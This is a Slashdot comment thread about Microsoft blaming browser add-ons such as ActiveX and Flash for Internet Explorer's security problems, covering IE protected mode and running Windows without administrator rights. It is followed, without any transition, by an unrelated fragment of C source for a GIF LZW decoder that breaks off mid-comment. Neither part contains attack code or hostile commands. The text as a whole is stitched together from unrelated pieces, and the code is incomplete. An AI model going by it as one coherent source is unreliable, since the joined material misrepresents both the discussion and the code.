part where he said he hadn't loaded IE? NoScript is a Firefox addon... Re: (Score:3, Informative) I think the article was not referring to addons in the sense that a geek thinks of them - adblock, firebug, noscript, etc. Instead, they mean the biggies - acrobat, flash, quicktime. Most systems will have some or all of those installed. Re: (Score:3, Interesting) Many non-power-users don't use addons at all. If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves. Many power-users install only a minimal number of addons to do what we want. Stuff like flash-block along with flash. We don't need a dozen fool-bars or huge numbers of widgets. Tied down! (Score:2, Insightful) It's browser woes are because the browser is the operating system and the operating system is the browser. Tie the two together and you reap what you sow! I think they have a point.. (Score:4, Funny) With the likes of ActiveX, and Silverlight out there, who could blame IE? Re:I think they have a point.. (Score:4, Insightful) 28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code. Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run! Re: (Score:3, Insightful) Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run! Are you trying to make a point that malware is IE's fault? Because if so, you just completely undercut it. What you said is true, and is the reason why users are the biggest threat to computer security, not the browser/OS/whatever. Re:I think they have a point.. (Score:5, Insightful) Users are always the biggest security threat. It's the OS's job to protect them. OSX and Linux seem to haev no problem doing this, so why can't Windows? Speaking of add-ons (Score:5, Insightful) Would an example of this include the Active X Control you have to install to be able to run Windows Update? Plugin model (Score:5, Insightful) Aren't the responsible for the plugin model in their browser? Aren't they responsible for the OS security? Take a look at how Chrome handles plugins and then try to pass the buck. Re:Plugin model (Score:4, Informative) Take a look at IE protected mode. Vista allows processes started by the user to run with different "integrity levels", effectively subdividing the user account into multiple ad-hoc roles while preserving the identity. IE protected mode is run in "low integrity" - where Vista on intrinsic level protects against modifications to the file system, registry, network access etc. Every plugin is executed in the same process under the same restrictions. IE offers a standard broker process which can be requested when a file has been downloaded (into a protected cache) and needs to be moved to the user-selected download location. The browser process has very limited capabilities. If a plugin needs more advanced access than what is provided by his broker process then it must install and invoke its own broker process, as the plugin itself runs under the restricted mode. Flash does this, circumventing the standard IE broker process. It was a bug in the Flash broker process (along with a Java vulnerability)which enabled a security researcher to execute a program on the Vista in the pwn2own contest. Presumably Adobe will use the same approach on other browsers with a similar model such as Chrome. That is why the security researcher was adament that the Flash flaw could have been used against *any* of the OSes. Chrome actually *also* uses the Vista low integrity feature. Presumably Google will emulate this Vista feature by using separate accounts on other OS'es which do not have process integrity levels (or other role subdivisions of user accounts) as a standard feature. Chrome does use separate processes (in low-integrity mode) for each tab. That does not provide more security against a rouge process taking over the machine, but it does provide more robustness and protect the individual tabs against other tabs going rogue because of browser bugs. Re: (Score:2, Interesting) Yes, they are responsible for the plug-in architecture. However, the architecture only provides the mechanism through which the plug-ins are loaded and communicate with the browser, they don't provide any further facility. The plug-ins are simply binaries which are loaded into the process space of the browser. The browser process dictates the security context under which the plug-in will execute. In all browsers on all platforms if the plug-in has a vulnerability exploiting that vulnerability gains the Yeah... that's the ticket (Score:2) But Windows is a security hole platform! (Score:2) After what was expected to be an unusually quiet Patch Tuesday, Microsoft has released eight patches for applications with an insufficient number of security holes [today.com]. alrea Largely yes and largely ignorance (mitigation) (Score:5, Interesting) Exploits for specific document types make compromising people's machines an issue. However, what 99.9% of people that revel in schadenfreude with IE's woes miss or fail to understand (yeah including many people on Slashdot) is that most Windows XP users (which are most Windows users, Vista is only 20%) run as as "root"!!! ("administrator" in the Windows vernacular) I wrote a utility called RemoveAdmin available on Download.com that leverages an API in Windows (CreateRestrictedToken) that strips administrative rights: The installer will create shortcuts for IE and Fifrefox but if you look carefully it's really a program with the browser .EXE passed as an argument. Which means you can strip administrative rights on anything you run... in fact that's exactly what I do. I don't run *anything* that talks on the Net without this. This means if you stumble across rigged .PDFs, Word documents, etc., etc., you won't suddenly have a keyboard logger installed because ignorant you is running with admin rights. (Some caveats) This is version 0.1. What would 1.0 have? A FAQ and user guide for starters. Also, I've seen this version not work in some cases, largely situations where AD is in play (probably because a user has multiple admin credentials). If you need to run ActiveX controls on a site (poor you if you use IE), just quit IE, go to the site, have the controls installed. Quit IE and re-run IE with the secure link. Likewise this is what you would do before going to WindowsUpate. And finally, to convince yourself the utility does something useful. Go to any site, "View Source" after you run your browser with the secure link and try to save the resultant .HTML/JavaScript to C:\Windows. You'll find you can't.... since your browser process doesn't have administrative rights (root) and thus any process it launches doesn't either (think of this as a plug-in scenario). Maybe I'll educate some % of the IT world yet... Respectfully, -M Re: (Score:3, Insightful) But tell me FreakinSyco... how many people, think Joe and Jane Sixpack run with non-administrative accounts at home under Windows XP? Even worse, 99% of IT people will do the same, i.e. rely on anti-virus vs. the principle of least privilege which they'll call out in a heartbeat on *NIX ("Don't run as root!!!") but fail to do the same when at home under Windows XP. It's largely a user education issue. Few people know about the tools Windows does offer and assume it's completely insecure (that's not true). Fur sandbox (Score:2) How about sandboxing the entire thing so that no matter what, with the flip of a switch, no writes to the HD are allowed, period (cookies or otherwise, I don't care to be tracked, and can remember more than one complex password). We could call it something scary, like jail. Or chroot jail. Think about it, next generation. I've given up on the current one. ABM (Score:3, Insightful) This is marking. Blame ABM, Anybody But Microsoft. Truth is that IE is not the best browser, but is better than it was. Firefox is also better than it was, so is Opera, so is Webkit (Safari). In the future, I expect Chrome, if it survives, to be better too. Why is any of this news? It is really just a marketing departments attemt to deflect blame away from where it belongs. It's really quite simple (Score:2) It's quite simple. You/They/We can define a very simple interface that displays some stuff and allows a few simple user inputs and maybe after a few years of debugging we might have a reliable browser suitable for basic stuff -- including financial data transfers and buying and selling stuff. Or we can continue to try to do everything in the world in our browsers and then act really surprised when our PC starts relaying 20 thousand spam messages a day or our money and/or data and/or identity ends up in Lich First Hand Refutation (Score:2, Informative) In any case, I didn't really care what sort of virus or malware or autodialer or rootkit or killprog or hypnotoad I picked u He's right you know ... (Score:4, Funny) And if you believe that I've got this great piece of land I'd like to sell you. It's still your damn fault (Score:5, Insightful) Now lets see... why is it that we need addons for something a simple as playing a video on youtube or streaming sound? Oh yea, that's right there's no cross platform open standards for doing so because SOMEBODY keeps failing to implement it. Seriously, even if the problem is buggy addons like Flash the whole reason we need those addons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it was not for Microsoft's continued hampering of web standards the majority of stuff flash is currently being used for could easily have been implemented using just html and javascript. So blame the browser or blame the addons, it's still all your fault in the end. ActiveXploit (Score:4, Funny) Wait, did Microsoft just admit that ActiveX is one of the largest security holes ever? Listen to his comments for the full story (Score:3, Interesting) Quick note: This article is a spin off of what Eric had to say during the most recent Black Hat Webcast, where Jeremiah Grossman was talking about clickjacking and other related browser issues. Eric made a lot of sense talking about plug ins and addons being the cross platform low hanging fruit. Listen and watch the webinar to hear what he had to say and keep everything in context: [on24.com] Or download the .m4b audio file when we get it online next week here: [blackhat.com]
http://tech.slashdot.org/story/08/11/21/2036222/microsoft-blames-add-ons-for-browser-woes
CC-MAIN-2014-35
refinedweb
6,296
71.14
its not throwing any errors any more. I just cannot figure out why it wont run the commands three times for each of the three variables (cat1,cat2,cat3) Type: Posts; User: Java_noob333 its not throwing any errors any more. I just cannot figure out why it wont run the commands three times for each of the three variables (cat1,cat2,cat3) Yea we havent got to arrays. When I did code it to ask three times and kept saying the variable had already been assigned. The program is supposed to get three cats info and display it. I thought that java would ask the input questions until all the variables were met. but it only asks once and then displays it three... Thank you very much. Not sure why that worked but it does. Now i even tried using my notebook to do it and I am still getting the same error messages. Maybe i need to find an older build? Thanks mike I changed that line but it still will not work. It still gives me the error: Could not find or load main class com.sun.tools.javac.Main Still not sure what the problem is. I... 1. public class Hello { public static void main(String[] args) { System.out.printIN("Hello, world!"); } } 2. When i did the version it came up with Javac 1.7.0_10 Any other ideas? 1631 OK Shzylo, I uninstalled Java and completed the process exactly how it was done in the video and I am still receiving the same error. :( Any other suggestions? Yep... C:\Documents and Settings\user>path PATH=C:\Program Files\AMD APP\bin\x86;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\ System32\Wbem;C:\WINDOWS\system32\WindowsPowerShell\v1.0;C:\Program... my path for javac is set to C:\Program Files\Java\jdk1.7.0\bin which is the default. I wrote out the Hello world program from my new book. its path is c:\document and settings\user\My...
http://www.javaprogrammingforums.com/search.php?s=11b59083dd8eeed8501495b3fb845d62&searchid=1272932
CC-MAIN-2014-52
refinedweb
332
76.32
DrawPoints - Invalid object length On 17/08/2015 at 01:23, xxxxxxxx wrote: I am using ScottA PyDraw Smooth Spline plugin to put a spline on the view (HUD), but I am getting a "ValueError: Invalid object length". Searching the forum, there are some issues, but no solution yet? I am using R15 and R16. cntrl_points = [cntrl_p1,cntrl_p2,cntrl_p3,cntrl_p4] #A list array containing the control points bd.SetPointSize(5.0) #Set the size of the points col = [.9, .1, .1]*4 #Set the color of the CV points bd.DrawPoints(cntrl_points, col, 3, None) #Draw the spline Control Points On 17/08/2015 at 04:39, xxxxxxxx wrote: Hi Pim, Yes there seem to have in issue in BaseDraw.DrawPoints() with its last argument 'vn' for the points normal when it's None. To have it work pass a valid list of normals (same number as point counts). This issue will be fixed. In the code of the PyDraw Smooth Spline: - Pass norm = [c4d.Vector(1)]*4 for the first call to DrawPoints() (4 points) - Pass norm = [c4d.Vector(1)]*13 for the second call to DrawPoints() (13 points) - The line cadr = [1]*924 for the second call to DrawPoints() is wrong, it has to be miltiplied by 39 only (13*3). If you find any bug or issue do not hesitate to submit it because the forum isn't a repository for bugs and they can be lost in threads (this one was). On 17/08/2015 at 06:56, xxxxxxxx wrote: Thanks Yannick , it is working now. Another question: Is there a faster/ better way to select one of the point or handles of the spline in the HUD? ScottA uses the mouse position and compares it with the position of the points. -Pim PS Before I submit a bug, I like to be sure that it is not an error from my side. On 17/08/2015 at 07:48, xxxxxxxx wrote: I just found that to make it work simply omit passing 'vn' parameter i.e. call DrawPoints() with only 3 parameters. Originally posted by xxxxxxxx Another question: Is there a faster/ better way to select one of the point or handles of the spline in the HUD? ScottA uses the mouse position and compares it with the position of the points. I think the mouse checks to get the current control point moved should be done in MouseInput() after the call to win.MouseDragStart(), not in GetCursorInfo(). Originally posted by xxxxxxxx PS Before I submit a bug, I like to be sure that it is not an error from my side. The issue can be reproduced if None is passed for 'vn' parameter and I think there's the same issue with 'vc'. On 17/08/2015 at 07:59, xxxxxxxx wrote: All clear now, thanks again. On 24/08/2015 at 02:31, xxxxxxxx wrote: I works ok in R15, but in R16, the spline is displayed twice. Once in the view port / Hud and once normal. Here the code Draw: def Draw(self, doc, data, bd, bh, bt, flags) : ################# This is the control points section #################### p1x = myDict['cp1x'] p1y = myDict['cp1y'] cntrl_p1 = c4d.Vector(p1x,p1y,0) #The first control point(the start of the spline) p2x = myDict['cp2x'] p2y = myDict['cp2y'] cntrl_p2 = c4d.Vector(p2x,p2y,0) #The second control point p3x = myDict['cp3x'] p3y = myDict['cp3y'] cntrl_p3 = c4d.Vector(p3x,p3y,0) #The third control point p4x = myDict['cp4x'] p4y = myDict['cp4y'] cntrl_p4 = c4d.Vector(p4x,p4y,0) #The fourth control point(the end of the splne) cntrl_points = [cntrl_p1,cntrl_p2,cntrl_p3,cntrl_p4] #A list array containing the control points bd.SetPointSize(15.0) #Set the size of the points col = [.9, .1, .1]*4 #Set the color of the CV points bd.DrawPoints(cntrl_points, col, 3) #Draw the spline Control Points ################# This is the spline's points section #################### steps = myDict['segments'] #The number of line segments s_points = smoothPoints(cntrl_points, steps) #The points of the spline cadr = [1]*924 #Set the color values for the points bd.SetPointSize(3.0) bd.DrawPoints(s_points, cadr, 3) #Draw points so we can see where each line in the spline begins/ends print "_points: ", s_points #Create a line between two points (except the last point) to create a spline size = len(s_points) for i in xrange(0,size-1) : bd.SetPen(c4d.Vector(1, 1, 1)) #Set color for draw operations bd.DrawLine2D(c4d.Vector(s_points[i].x,s_points[i].y, 0) , c4d.Vector(s_points[i+1].x,s_points[i+1].y, 0)) c4d.EventAdd() return c4d.TOOLDRAW_HANDLES|c4d.TOOLDRAW_AXIS In the documentation I do not see any relevant changes in R15 to R16. Also, is there a way to display and use Tangents in the viewport / Hud? On 24/08/2015 at 05:49, xxxxxxxx wrote: Changing bd.DrawPoints to bd.DrawPoint2D seems to solve the issue. Now only the 2d is shown. Of course, bd.SetPointSize is not used. Only a one pixel point is displayed using DrawPoint2D. Still trying to find out how to display / set tangents. -Pim On 24/08/2015 at 07:33, xxxxxxxx wrote: Hi Pim, I wrote this plugin using R13. And it works properly with that version. But Maxon keeps on making major changes to the SDK. Especially the Python SDK. So try not to follow my code too closely. Just use it as a general guide. With all of the change they make to the SDK from version to version. You might have to completely re-write it for R16++. -ScottA On 24/08/2015 at 08:01, xxxxxxxx wrote: Hi Scott, Thanks again for all your plugins and yes I use them mostly as guidelines. I learn a lot that way. It is step by step, but I think I am getting there. Now the main issue is, how to get the tangents. -Pim On 25/08/2015 at 01:12, xxxxxxxx wrote: Hi Pim, You can also use bd.DrawLine2D() to draw tangents. On 25/08/2015 at 04:44, xxxxxxxx wrote: Ok, does that means I must write my own tangent calculation or can I use sdk functions / routines? On 25/08/2015 at 06:13, xxxxxxxx wrote: Originally posted by xxxxxxxx Ok, does that means I must write my own tangent calculation or can I use sdk functions / routines? You may use the spline data and calculation in the API provided by SplineData. On 25/08/2015 at 07:43, xxxxxxxx wrote: The only reason why my plugin exists at all is because the C4D SDK doesn't have any 2D Spline Draw classes in it. And when I asked for help with how to make them myself. All I got were crickets chirping. After weeks and weeks of searching the internet for examples. I found mostly just the maths posted for this subject. The math for splines is quite complex. And not easy to convert into computer code. It took me quite a lot of time and effort to figure out how to draw a 2D spline to the Editor view in C4D. Too long! I did not want anyone else to have to go through the same hell I went through just to draw a smooth cubic spline in 2D. So I posted my code for everyone to see how simple it is, once you have the complex maths converted into computer code. So if there are people out there that do know how to write the tangents code part for this. Or even have other types of code for drawing splines in their tool kit. Please do what I did, and pay it forward and post an example for the rest of use to learn from. Posting a bunch of complex maths to WIKI does not help. We need to see it in code form. This is one of those subjects where finding good simple code examples was very difficult to find. Thanks, -ScottA On 25/08/2015 at 12:23, xxxxxxxx wrote: I have the following options /thoughts, I still need to investigate. 1) C4dJack wrote an article on c4dprogramming on "drawing a spline in the viewport". I want to use that as a start, assuming viewport = hud. So a 2d spline. 2) To calculate tangent, I want to use the code Martin provided: #_______________________________________________________ ) 3) And of course SplineData as Yannick said. "You may use the spline data and calculation in the API provided by SplineData." I will asked him to elaborate on this (give me more details). These are just some thoughts I still need to investigate. -Pim On 25/08/2015 at 12:25, xxxxxxxx wrote: Originally posted by xxxxxxxx Originally posted by xxxxxxxx Ok, does that means I must write my own tangent calculation or can I use sdk functions / routines? You may use the spline data and calculation in the API provided by SplineData. Hi Yannick, Could you elaborate a bit more on what you mean. If possible, more details, directions to display a 2d (hud) spline. -Pim
https://plugincafe.maxon.net/topic/8995/11941_drawpoints--invalid-object-length
CC-MAIN-2021-17
refinedweb
1,506
74.19
Reference Index Table of Contents Operations on CPU affinity sets: CPU_EQUAL - test equality of two sets CPU_ZERO - clear all CPUs from set CPU_SET - set a specified CPU in a set CPU_CLR - unset a specified CPU in a set CPU_ISSET - test if a specified CPU in a set is set CPU_COUNT - return the number of CPUs currently set CPU_AND - obtain the intersection of two sets CPU_OR - obtain the union of two sets CPU_XOR - obtain the mutually excluded set #include <sched.h> int CPU_EQUAL(cpu_set_t * set1, cpu_set_t * set2);); The cpu_set_t data structure represents a set of CPUs. CPU sets are used by sched_setaffinity() and pthread_setaffinity_np(), etc. The cpu_set_t data type is implemented as a bitset. However, the data structure. These macros either return a value consistent with the operation or nothing. These macros do not return an error status. sched_getaffinity(3) , sched_setaffinity(3) , pthread_setaffininty_np(3) , pthread_getaffinity_np(3) . Table of Contents
http://sourceware.org/pthreads-win32/manual/cpu_set.html
CC-MAIN-2016-07
refinedweb
148
55.44
darts.util.events 0.4 Simple C#-style event dispatcher Preface Introduction This library provides a simple event dispatcher, similar to the event construct provided by the C# language. The library has no external dependencies. It was intended for use cases, where the components emitting events and the components listening for events agree about the type of event and the semantics associated with it. This is true, for example, for event handlers, which listen on “click” events signalled by GUI button objects, or notifications signalled by objects, whenever the value of some property changes. This differs from the approach taken by, say, the PyDispatcher, which is more generic, and favours communication among weakly coupled components. Compatibility The code was mainly written for and tested with Python 2.6. It is known to work with Python 3.2. It should be compatible to 2.5 as well, but you might have to insert a few from __future__ import with_statement lines here and there (and this is generally untested). It should work (this has not been tested) with alternative implementations of Python like Jython or IronPython. Note, though, that some of the test cases defined in this file might fail due to different garbage collection implementations; this file was written with CPython in mind. Documentation Basic Usage >>> from darts.lib.utils.event import Publisher, ReferenceRetention as RR >>> some_event = Publisher() The Publisher is the main component. It acts as registry for callbacks/listeners. Let’s define a listener >>> def printer(*event_args, **event_keys): ... print event_args, event_keys In order to receive notifications, clients must subscribe to a publisher. This can be as simple as >>> some_event.subscribe(printer) #doctest: +ELLIPSIS <SFHandle ...> The result of the call to subscribe is an instance of (some subclass of) class Subscription. This value may be used later, in order to cancel the subscription, when notifications are no longer desired. The actual subclass is an implementation detail you should normally not care about. All you need to know (and are allowed to rely on, in fact) is, that it will be an instance of class Subscription, and it will provide whatever has been documented as public API of that class (right now: only method cancel). Now, let’s signal an event and see what happens: >>> some_event.publish('an-event') ('an-event',) {} As you can see, the printer has been notified of the event, and duefully printed the its arguments to the console. Cancelling subscriptions As mentioned, the result of calling subscribe is a special subscription object, which represents the registration of the listener with the publisher. >>> s1 = some_event.subscribe(printer) >>> some_event.publish('another-event') ('another-event',) {} ('another-event',) {} >>> s1.cancel() True >>> some_event.publish('yet-another-one') ('yet-another-one',) {} The publisher is fully re-entrant. That means, that you can subscribe to events from within a listener, and you can cancel subscriptions in that context as well: >>> def make_canceller(subs): ... def listener(*unused_1, **unused_2): ... print "Cancel", subs, subs.cancel() ... return listener >>> s1 = some_event.subscribe(printer) >>> s2 = some_event.subscribe(make_canceller(s1)) >>> some_event.publish('gotta-go') #doctest: +ELLIPSIS ('gotta-go',) {} ('gotta-go',) {} Cancel <SFHandle ...> True >>> some_event.publish('gone') #doctest: +ELLIPSIS ('gone',) {} Cancel <SFHandle ...> False >>> s1.cancel() False The result of the call to cancel tells us, that the subscription had already been undone prior to the call (by our magic cancellation listener). Generally, calling cancel multiple times is harmless; all but the first call are ignored. Let’s now remove the magic I-can-cancel-stuff listener and move on: >>> s2.cancel() True Using Non-Callables as callbacks Whenever we made subscriptions above, we actually simplied things a little bit. The full signature of the method is: def subscribe(listener[, method[, reference_retention]]) Let’s explore the method argument first. Up to now, we only used function objects as listeners. Basically, in fact, we might have used any callable object. Remember, that any object is “callable” in Python, if it provides a __call__ method, so guess, what’s the default value of the method argument? >>> s1 = some_event.subscribe(printer, method='__call__') >>> some_event.publish('foo') ('foo',) {} ('foo',) {} >>> s1.cancel() True Nothing new. So, now you might ask: when do I use a different method name? >>> class Target(object): ... def __init__(self, name): ... self.name = name ... def _callback(self, *args, **keys): ... print self.name, args, keys >>> s1 = some_event.subscribe(Target('foo')) >>> some_event.publish('Bumm!') #doctest: +ELLIPSIS Traceback (most recent call last): ... TypeError: 'Target' object is not callable Oops. Let’s remove the offender, before someone notices our mistake: >>> s1.cancel() True >>> s1 = some_event.subscribe(Target('foo'), method='_callback') >>> some_event.publish('works!') ('works!',) {} foo ('works!',) {} Reference Retention So, that’s that. There is still an unexplored argument to subscribe left, though: reference_retention. The name sounds dangerous, but what does it do? >>> listener = Target('yummy') >>> s2 = some_event.subscribe(listener, method='_callback', reference_retention=RR.WEAK) >>> some_event.publish('yow') ('yow',) {} foo ('yow',) {} yummy ('yow',) {} Hm. So far, no differences. Let’s make a simple change: >>> listener = None >>> some_event.publish('yow') ('yow',) {} foo ('yow',) {} Ah. Ok. Our yummy listener is gone. What happened? Well, by specifying a reference retention policy of WEAK, we told the publisher, that it should use a weak reference to the listener just installed, instead of the default strong reference. And after we released the only other known strong reference to the listener by setting listener to None, the listener was actually removed from the publisher. Note, BTW., that the above example may fail with python implementations other than CPython, due to different policies with respect to garbage collection. The principle should remain valid, though, in Jython as well as IronPython, but in those implementations, there is no guarantee, that the listener is removed as soon as the last reference to it is dropped. Of course, this all works too, if the method to be called is the default one: __call__: >>> def make_listener(name): ... def listener(*args, **keys): ... print name, args, keys ... return listener >>> listener = make_listener('weak') >>> s2 = some_event.subscribe(listener, reference_retention=RR.WEAK) >>> some_event.publish('event') ('event',) {} foo ('event',) {} weak ('event',) {} >>> listener = None >>> some_event.publish('event') ('event',) {} foo ('event',) {} That’s about all there is to know about the library. As I said above: it is simple, and might not be useful for all scenarioes and use cases, but it does what it was written to. Error handling The Publisher class is not intended to be subclassed. If you need to tailor the behaviour, you use policy objects/callbacks, which are passed to the constructor. Right now, there is a single adjustable policy, namely, the behaviour of the publisher in case, listeners raise exceptions: >>> def toobad(event): ... if event == 'raise': ... raise ValueError >>> s1 = some_event.subscribe(toobad) >>> some_event.publish('harmless') ('harmless',) {} foo ('harmless',) {} >>> some_event.publish('raise') Traceback (most recent call last): ... ValueError As you can see, the default behaviour is to re-raise the exception from within publish. This might not be adequate depending on the use case. In particular, it will prevent any listeners registered later to be run. So, let’s define our own error handling: >>> def log_error(exception, value, traceback, subscription, args, keys): ... print "caught", exception >>> publisher = Publisher(exception_handler=log_error) >>> publisher.subscribe(toobad) #doctest: +ELLIPSIS <SFHandle ...> >>> publisher.subscribe(printer) #doctest: +ELLIPSIS <SFHandle ...> >>> publisher.publish('harmless') ('harmless',) {} >>> publisher.publish('raise') caught <type 'exceptions.ValueError'> ('raise',) {} As an alternative to providing the error handler at construction time, you may also provide an error handler when publishing an event, like so: >>> def log_error_2(exception, value, traceback, subscription, args, keys): ... print "caught", exception, "during publication" >>> publisher.publish_safely(log_error_2, 'raise') caught <type 'exceptions.ValueError'> during publication ('raise',) {} As you can see, the per-call error handler takes precedence over the publisher’s default error handler. Note, that there is no chaining, i.e., if the per-call error handler raises an exception, the publisher’s default handler is not called, but the exception is simply propagated outwards to the caller of publish_safely: the publisher has no way to distinguish between exceptions raised because the handler wants to abort the dispatch and exceptions raised by accident, so all exceptions raised by the handler are simply forwarded to the client application. Thread Safety The library is fully thread aware and thread safe. Thus, subscribing to a listener shared across multiple threads is safe, and so is cancelling subscriptions. Changes Version 0.4 Subscription handles now provide access to their listener objects and method names. This was added for the sake of error handling code, which wants to log exceptions and provide a better way of identifying the actual listener, which went rogue. Version 0.3 Fixed setup.py to properly proclaim the namespace packages used. Version 0.2 Error handling has been changed. Instead of subclassing the publisher, the default exception handler is now passed as callback to the publisher during construction. The class Publisher is now documented as “not intended for being subclassed”. - Author: Deterministic Arts - Documentation: darts.util.events package documentation - License: MIT - Categories - Development Status :: 5 - Production/Stable - Intended Audience :: Developers - License :: OSI Approved :: MIT License - Operating System :: OS Independent - Programming Language :: Python :: 2.6 - Programming Language :: Python :: 2.7 - Programming Language :: Python :: 3 - Programming Language :: Python :: 3.0 - Programming Language :: Python :: 3.1 - Topic :: Utilities - Package Index Owner: dirk.esser - DOAP record: darts.util.events-0.4.xml
https://pypi.python.org/pypi/darts.util.events
CC-MAIN-2016-36
refinedweb
1,531
50.84
.html.HtmlOutputFormatjavax.faces.component.html.HtmlOutputFormat public class HtmlOutputFormat Represents a component that looks up a localized message in a resource bundle, optionally uses it as a MessageFormat pattern string and substitutes in parameter values from nested UIParameter components, and renders the result. If the "dir" or "lang" attributes are present, render a span element and pass them through as attributes on the span. By default, the rendererType property must be set to " javax.faces.Format". This value can be changed by calling the setRendererType() method. public static final String COMPONENT_TYPE The standard component type for this component. public HtmlOutputFormat() public String getDir() Return the value of the dir property. Contents: Direction indication for text that does not inherit directionality. Valid values are "LTR" (left-to-right) and "RTL" (right-to-left). public void setDir(String dir) Set the value of the dir property. public boolean isEscape() Return the value of the escape property. Contents: Flag indicating that characters that are sensitive in HTML and XML markup must be escaped. This flag is set to "true" by default. public void setEscape(boolean escape) Set the value of the escape property. public String getLang() Return the value of the lang property. Contents: Code describing the language used in the generated markup for this component. public void setLang(String lang) Set the value of the lang property. public String getStyle() Return the value of the style property. Contents: CSS style(s) to be applied when this component is rendered. public void setStyle(String style) Set the value of the style property. public String getStyleClass() Return the value of the styleClass property. Contents: Space-separated list of CSS style class(es) to be applied when this element is rendered. This value must be passed through as the "class" attribute on generated markup. public void setStyleClass(String styleClass) Set the value of the styleClass property. public String getTitle() Return the value of the title property. Contents: Advisory title information about markup elements generated for this component. public void setTitle(String title) Set the value of the title property. public saveStatein class UIOutput public void restoreState(FacesContext _context,. restoreStatein interface StateHolder restoreStatein class UIOutput Copyright 2007 Sun Microsystems, Inc. All rights reserved. Use is subject to license terms.
https://docs.oracle.com/javaee/5/api/javax/faces/component/html/HtmlOutputFormat.html
CC-MAIN-2018-13
refinedweb
373
51.14
Using firebase as plugin in Quasar 0.15 I’m trying to add firebase as plugin following the guide like it explains in the axios example. But I don’t have positives results. When I try to call firebase.auth() from my router I get a console error saying that this.$auth is undefined. My firebase.js plugin: // import something here import * as firebase from ‘firebase’ // leave the export, even if you don’t use it export default ({ router, Vue }) => { // something to do const config = { apiKey: ‘AIzaSyBzzE4ISXNiIB0c8g6rv8kxSOk0dlgL3qc’, authDomain: ‘okinoi-94a39.firebaseapp.com’, databaseURL: ‘’, projectId: ‘okinoi-94a39’, storageBucket: ‘okinoi-94a39.appspot.com’, messagingSenderId: ‘758988975300’ }; const firebaseApp = firebase.initializeApp(config) Vue.prototype.$auth = firebaseApp.auth() } I added it to quasar.conf.js file in plugins array as ‘firebase’ And called the function in the index.js of router writting this.$auth Any idea or example of how can we implement firebase auth in latest Quasar version? Steps from github issue: - create plugin - change code to import * as firebase from 'firebase' const config = { apiKey: '...', authDomain: '...', databaseURL: '...', projectId: '...', storageBucket: '...', messagingSenderId: '...' } const fireApp = firebase.initializeApp(config) export const AUTH = fireApp.auth() export default ({ app, router, Vue }) => { Vue.prototype.$auth = AUTH } and use it there is also a starterkit for quasar & firebase: I just pushed several improvements. Feel free to clone or downlad it. @cristalt said in Using firebase as plugin in Quasar 0.15: I just pushed several improvements. Feel free to clone or downlad it. i try it and i’ve got an error, i’m using quasar v0.17, can you help me? @cristalt said in Using firebase as plugin in Quasar 0.15: @justdior let’s do it! Tell me more about it. What kind of error have you got? This is the error i’ve got when i install the repo: Step to produce: yarn install v1.12.3 $ quasar -v 0.17.22 $ node -v v11.3.0 $ yarn error upath@1.0.4: The engine "node" is incompatible with this module. Expected version ">=4 <=9". Got "11.3.0" error Found incompatible module info Visit for documentation about this command. same error when use npm too The error is not related with repo. Quasar CLI uses yarn to create the project. The node version you have is incompatible with the installed yarn version. As log says, the node version must be “>=4 <=9” I’ve experimented the same error on my local since ago. I recomend you change the node version. If you have nvm, it could be very easy. Then reinstall Yarn and Quasar CLI under new node version selected; 8.9.0 will work. Hope it helps you.
https://forum.quasar-framework.org/topic/1970/using-firebase-as-plugin-in-quasar-0-15/1
CC-MAIN-2019-22
refinedweb
441
70.9
#include <Arena.H> A Virtual Base Class for Dynamic Memory Management This is a virtual base class for objects that manage their own dynamic memory allocation. Since it is a virtual base class, you have to derive something from it to use it. Allocate a dynamic memory arena of size a_sz. A pointer to this memory should be returned. Implemented in BArena, and CArena. Referenced by BaseFab< T >::define(). A pure virtual function for deleting the arena pointed to by a_pt. Implemented in BArena, and CArena. Referenced by BaseFab< T >::undefine(). Given a minimum required arena size of a_sz bytes, this returns the next largest arena size that will hold an integral number of objects of the largest of the types void*, long, double and function pointer.
http://davis.lbl.gov/Manuals/CHOMBO-RELEASE-3.2/classArena.html
CC-MAIN-2018-17
refinedweb
127
58.69
By Chris Wendt on October 15, 2018 We’re happy to announce that Sourcegraph extensions are ready for early adopters to start writing their own extensions. Sourcegraph extensions allow you to extend code hosts like GitHub in the same way that editor extensions allow you to extend editors. Once you write an extension, it runs anywhere you see code (e.g. GitHub). Here’s an extension that shows a tooltip when you hover over code: import * as sourcegraph from "sourcegraph"; export function activate(): void { sourcegraph.languages.registerHoverProvider(["*"], { provideHover: () => ({ contents: { value: "Hello, world! 🎉🎉🎉" } }) }); } Here’s another extension that adds a link to the npm registry next to import/require statements in JavaScript/TypeScript code: When you publish your extension to the Sourcegraph.com extension registry, anyone can install and instantly start using it. (Sourcegraph Enterprise supports a private extension registry.) Next steps: src extensions publishcommand for publishing Sourcegraph extensions
https://about.sourcegraph.com/blog/extension-authoring/
CC-MAIN-2018-47
refinedweb
148
55.84
> Cimage.zip > GIFDECOD.C. * */ #include "stdafx.h" #include "gifdecod.h" #ifdef _DEBUG #define new DEBUG_NEW #undef THIS_FILE static char THIS_FILE[] = __FILE__; #endif static LONG code_mask[13]= { 0, 0x0001, 0x0003, 0x0007, 0x000F, 0x001F, 0x003F, 0x007F, 0x00FF, 0x01FF, 0x03FF, 0x07FF, 0x0FFF }; /* This function initializes the decoder for reading a new image. */ SHORT GIFDecoder::init_exp(SHORT size) { curr_size = size + 1; top_slot = 1 << curr_size; clear = 1 << size; ending = clear + 1; slot = newcodes = ending + 1; navail_bytes = nbits_left = 0; return(0); } /* get_next_code() * - gets the next code from the GIF file. Returns the code, or else * a negative number in case of file errors... */ SHORT GIFDecoder::get_next_code() { SHORT i, x; ULONG ret; if (nbits_left == 0) {++; nbits_left = 8; --navail_bytes; } ret = b1 >> (8 - nbits_left); while (curr_size > nbits_left) {++; ret |= b1 << nbits_left; nbits_left += 8; --navail_bytes; } nbits_left -= curr_size; ret &= code_mask[curr_size]; return((SHORT)(ret)); } /* The reason we have these seperated like this instead of using * a structure like the original Wilhite code did, is because this * stuff generally produces significantly faster code when compiled... * This code is full of similar speedups... (For a good book on writing * C for speed or for space optomisation, see Efficient C by Tom Plum, * published by 